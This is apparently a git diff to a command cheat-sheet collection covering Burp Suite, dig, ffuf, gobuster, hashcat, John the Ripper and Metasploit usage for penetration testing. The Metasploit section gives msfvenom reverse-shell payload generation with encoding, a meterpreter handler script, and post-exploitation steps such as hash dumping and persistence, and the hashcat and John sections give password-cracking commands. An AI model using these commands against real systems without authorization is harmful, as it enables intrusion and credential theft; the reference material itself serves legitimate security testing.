andrewjkerr · VimalChaudhary07 · Mar 8, 2025 · Mar 8, 2025 · Mar 8, 2025 · Mar 8, 2025
diff --git a/burpsuite b/burpsuite
@@ -0,0 +1,43 @@
+# Proxy Configuration
+# Configure browser to use proxy: 127.0.0.1:8080
+# Install Burp's CA Certificate in browser
+
+# Scoping
+# Target > Scope > Add to scope
+# Filter proxy traffic: Proxy > Options > Intercept Client Requests > And URL Is in target scope
+
+# Scanning
+# Target > Site map > Select host > Right click > Active Scan
+# Scanner > Options > Configure scan settings
+
+# Intruder Attack Types
+# Sniper: Single position, one wordlist
+# Battering ram: Multiple same positions, one wordlist
+# Pitchfork: Multiple positions, multiple wordlists
+# Cluster bomb: Multiple positions, multiple wordlists (all combinations)
+
+# Common Payloads
+# Intruder > Payloads
+# Simple list: wordlist
+# Runtime file: generated payloads
+# Custom iterator: complex patterns
+# Extension-generated: programmatic payloads
+
+# Session Handling
+# Project options > Sessions
+# Rules for managing cookies, tokens
+# Macros for automated actions
+
+# Extensions
+# Extender > BApp Store
+# Popular extensions:
+# - JWT Editor
+# - AuthMatrix
+# - Turbo Intruder
+# - Logger++
+
+# Advanced Features
+# Comparer: Compare requests/responses
+# Decoder: Encode/decode data
+# Sequencer: Analyze token randomness
+# Collaborator: Test OAST vulnerabilities
diff --git a/dig b/dig
@@ -1 +1,48 @@
-#To run dig (domain information groper)dig [domain]#To just get the ip addressdig [domain] +nocomments +noauthority +noadditional +nostats ORdig [domain] +noall +answerORdig [domain] +short#To use a specific query typedig -t [query type] [domain] [options]ORdig [domain] [query type] [options]#To view ALL DNS record types use query ANYdig -t ANY [domain] [options]ORdig [domain] ANY [options]#To do a DNS reverse look up dig -x [ip address] +short#To use a specific DNS serverdig @[specific DNS] [domain]#To do a bulk DNS query (where file.txt has all the domains, one to a line)dig [domain1] [options] [domain2] [options]ORdit -f file.txt [options]
+# To run dig (domain information groper)
+dig [domain]
+
+# To just get the ip address
+dig [domain] +nocomments +noauthority +noadditional +nostats
+# OR
+dig [domain] +noall +answer
+# OR
+dig [domain] +short
+
+# To use a specific query type
+dig -t [query type] [domain] [options]
+# OR
+dig [domain] [query type] [options]
+
+# To view ALL DNS record types use query ANY
+dig -t ANY [domain] [options]
+# OR
+dig [domain] ANY [options]
+
+# To do a DNS reverse look up 
+dig -x [ip address] +short
+
+# To use a specific DNS server
+dig @[specific DNS] [domain]
+
+# To do a bulk DNS query (where file.txt has all the domains, one to a line)
+dig [domain1] [options] [domain2] [options]
+# OR
+dig -f file.txt [options]
+
+# To trace the DNS lookup path
+dig +trace [domain]
+
+# To query specific record types
+dig [domain] A     # IPv4 addresses
+dig [domain] AAAA  # IPv6 addresses
+dig [domain] MX    # Mail servers
+dig [domain] NS    # Name servers
+dig [domain] TXT   # TXT records
+dig [domain] SOA   # Start of Authority
+dig [domain] CNAME # Canonical name
+
+# To set timeout and number of retries
+dig +time=5 +tries=2 [domain]
+
+# To use TCP instead of UDP
+dig +tcp [domain]
diff --git a/ffuf b/ffuf
@@ -0,0 +1,34 @@
+# Basic directory fuzzing
+ffuf -w wordlist.txt -u http://target/FUZZ
+
+# Multiple parameters fuzzing
+ffuf -w params.txt:PARAM -w values.txt:VAL -u http://target/script.php?PARAM=VAL
+
+# Headers fuzzing
+ffuf -w wordlist.txt -u http://target -H "FUZZ: value"
+
+# POST data fuzzing
+ffuf -w wordlist.txt -X POST -d "username=admin\&password=FUZZ" -u http://target
+
+# Filter responses
+# Match size
+ffuf -w wordlist.txt -u http://target/FUZZ -fs 4242
+# Match words
+ffuf -w wordlist.txt -u http://target/FUZZ -fw 42
+# Match lines
+ffuf -w wordlist.txt -u http://target/FUZZ -fl 42
+# Match time
+ffuf -w wordlist.txt -u http://target/FUZZ -ft 2.42
+
+# Custom matching
+# Match status codes
+ffuf -w wordlist.txt -u http://target/FUZZ -mc 200,204,301,302,307,401
+# Match regular expressions
+ffuf -w wordlist.txt -u http://target/FUZZ -mr "admin"
+
+# Rate limiting
+ffuf -w wordlist.txt -u http://target/FUZZ -p 0.1
+
+# Output formats
+ffuf -w wordlist.txt -u http://target/FUZZ -o results.json
+# Supported formats: json, ejson, html, md, csv, ecsv
diff --git a/gobuster b/gobuster
@@ -0,0 +1,50 @@
+# Directory Enumeration
+# Basic directory scan
+gobuster dir -u http://target -w wordlist.txt
+
+# Advanced Options
+# With file extensions
+gobuster dir -u http://target -w wordlist.txt -x php,txt,html
+
+# With custom status codes
+gobuster dir -u http://target -w wordlist.txt -s 200,204,301,302,307,401,403
+
+# With custom threads
+gobuster dir -u http://target -w wordlist.txt -t 50
+
+# With custom timeout
+gobuster dir -u http://target -w wordlist.txt --timeout 30s
+
+# DNS Enumeration
+# Basic DNS scan
+gobuster dns -d example.com -w wordlist.txt
+
+# With specific resolver
+gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8
+
+# VHOST Enumeration
+# Basic vhost scan
+gobuster vhost -u http://target -w wordlist.txt
+
+# With custom headers
+gobuster vhost -u http://target -w wordlist.txt -H 'User-Agent: CustomAgent'
+
+# Advanced Features
+# Pattern matching
+gobuster dir -u http://target -w wordlist.txt -p pattern
+
+# Custom cookies
+gobuster dir -u http://target -w wordlist.txt -c 'session=123456'
+
+# Basic auth
+gobuster dir -u http://target -w wordlist.txt -U username -P password
+
+# Output formats
+gobuster dir -u http://target -w wordlist.txt -o output.txt
+gobuster dir -u http://target -w wordlist.txt -o output.json -f json
+
+# Wildcard detection
+gobuster dir -u http://target -w wordlist.txt --wildcard
+
+# Custom User-Agent
+gobuster dir -u http://target -w wordlist.txt -a 'CustomUserAgent/1.0'
diff --git a/hashcat b/hashcat
@@ -0,0 +1,45 @@
+# Basic Usage
+hashcat -m <hash-type> -a <attack-mode> <hash-file> <wordlist>
+
+# Common Hash Types (-m)
+# 0: MD5
+# 100: SHA1
+# 1000: NTLM
+# 1800: sha512crypt $6$
+# 3200: bcrypt
+# 5600: NetNTLMv2
+
+# Attack Modes (-a)
+# 0: Straight (wordlist)
+# 1: Combination
+# 3: Brute-force
+# 6: Hybrid Wordlist + Mask
+# 7: Hybrid Mask + Wordlist
+
+# Mask Attack Examples
+# ?l = abcdefghijklmnopqrstuvwxyz
+# ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
+# ?d = 0123456789
+# ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+# ?a = ?l?u?d?s
+hashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l
+
+# Rule-based Attack
+hashcat -a 0 -m 0 hash.txt wordlist.txt -r rules/best64.rule
+
+# Show Cracked Passwords
+hashcat -m 0 hash.txt --show
+
+# Benchmark
+hashcat -b
+
+# Session Management
+# Start new session
+hashcat --session name
+# Restore session
+hashcat --session name --restore
+
+# Performance Tuning
+# Workload profile (-w)
+# 1: Low, 2: Default, 3: High, 4: Nightmare
+hashcat -w 3
diff --git a/john b/john
@@ -1 +1,44 @@
-#To show the types of passwords that John can crack with crack speed (in cracks/second)john --test#To use your own word list (the Rockyou list is suggested)john --wordlist=[filename] [passwordfile]#To show your results after running john (shows ~/.john/john.pot)john --show#To restore an interrupted john sessionjohn --restore
+# To show the types of passwords that John can crack with crack speed (in cracks/second)
+john --test
+
+# To use your own word list (the Rockyou list is suggested)
+john --wordlist=[filename] [passwordfile]
+
+# To show your results after running john (shows ~/.john/john.pot)
+john --show
+
+# To restore an interrupted john session
+john --restore
+
+# To use a specific format for cracking
+john --format=<format> [passwordfile]
+
+# Common formats:
+# raw-md5, raw-sha1, raw-sha256, raw-sha512
+# mysql, mysql-sha1
+# nt, lm
+# crypt
+
+# To use rules while cracking
+john --rules --wordlist=[filename] [passwordfile]
+
+# To use mask attack
+john --mask='?l?l?l?l?l?d?d' [passwordfile]
+
+# To use incremental mode
+john --incremental [passwordfile]
+
+# To use multiple cores
+john --fork=4 [passwordfile]
+
+# To list all available formats
+john --list=formats
+
+# To show cracking status
+john --status
+
+# To create custom rules
+# Add to john.conf:
+# [List.Rules:Custom]
+# $[0-9]$[0-9]
+john --wordlist=[filename] --rules:Custom [passwordfile]
diff --git a/metasploit b/metasploit
@@ -1,26 +1,82 @@
-# To show all exploits that for a vulnerability
+# Basic Usage
+# Start metasploit console
+msfconsole
+
+# Show all exploits for a vulnerability
 grep <vulnerability> show exploits
 
-# To select an exploit to use
+# Select an exploit to use
 use <exploit>
 
-# To see the current settings for a selected exploit
+# Show current settings for selected exploit
 show options
 
-# To see compatible payloads for a selected exploit
+# Show compatible payloads for selected exploit
 show payloads
 
-# To set the payload for a selected exploit
+# Set the payload for selected exploit
 set payload <payload>
 
-# To set setting for a selected exploit 
+# Set setting for selected exploit 
 set <option> <value>
 
-# To run the exploit
+# Run the exploit
 exploit
 
-# One liner to create/generate a payload for windows
-msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
+# Advanced Usage
+# Search for specific exploits/modules
+search type:exploit platform:windows ms17-010
+
+# Use advanced options
+set ADVANCED true
+show advanced
+
+# Generate shellcode
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
+
+# Payload Encoding
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 10 -f exe > encoded_shell.exe
+
+# Post Exploitation
+# Get system info
+sysinfo
+
+# Dump hashes
+hashdump
+
+# Upload/Download files
+upload <local_file> <remote_destination>
+download <remote_file> <local_destination>
+
+# Port forwarding
+portfwd add -l <local_port> -p <remote_port> -r <remote_host>
+
+# Pivoting
+route add <subnet> <netmask> <session>
+
+# Persistence
+run persistence -X -i 5 -p 443 -r <remote_host>
+
+# Load extensions
+load <extension_name>
+
+# Database Operations
+# Connect to database
+db_connect <username>:<password>@<host>:<port>/<database>
+
+# Import scan results
+db_import <file>
+
+# Show hosts/services
+hosts
+services
+
+# Workspace management
+workspace -a <name>
+workspace <name>
 
-# One liner start meterpreter
-msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
+# Resource Scripts
+# Create and run resource scripts
+echo "use exploit/multi/handler" > script.rc
+echo "set payload windows/meterpreter/reverse_tcp" >> script.rc
+resource script.rc